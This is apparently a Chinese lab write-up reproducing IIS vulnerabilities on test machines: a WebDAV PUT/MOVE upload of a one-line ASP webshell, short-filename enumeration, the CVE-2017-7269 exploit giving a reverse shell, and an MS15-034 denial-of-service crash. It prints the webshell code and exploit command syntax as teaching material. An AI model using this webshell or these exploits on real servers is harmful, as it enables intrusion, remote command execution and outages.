IIS漏洞再现

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个"."的时候,以文件最后一个"."作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了

相关推荐
p***92486 分钟前
Nginx location 和 proxy_pass 配置详解
服务器·网络·nginx
L***B56812 分钟前
Nginx代理到https地址忽略证书验证配置
运维·nginx·https
源梦想20 分钟前
绝地幸存者H5割草网页小游戏Linux部署演示
linux·运维·服务器
凑齐六个字吧28 分钟前
单细胞LIANA受配体分析框架学习
linux·服务器·windows
拾心2134 分钟前
【云运维】K8s管理(二)
运维·容器·kubernetes
e***58231 小时前
Nginx 配置前端后端服务
运维·前端·nginx
qq_526099131 小时前
实时工业图像采集卡 | 低延迟传输,满足自动化生产线需求
运维·自动化
盛满暮色 风止何安1 小时前
WAF的安全策略
linux·运维·服务器·网络·网络协议·安全·网络安全
岳清源1 小时前
MYSQL数据库集群高可用和数据监控平台
linux·运维·服务器
lihui_cbdd1 小时前
Linux 压缩与解压终极指南:全格式、分卷与进阶操作
linux·运维·服务器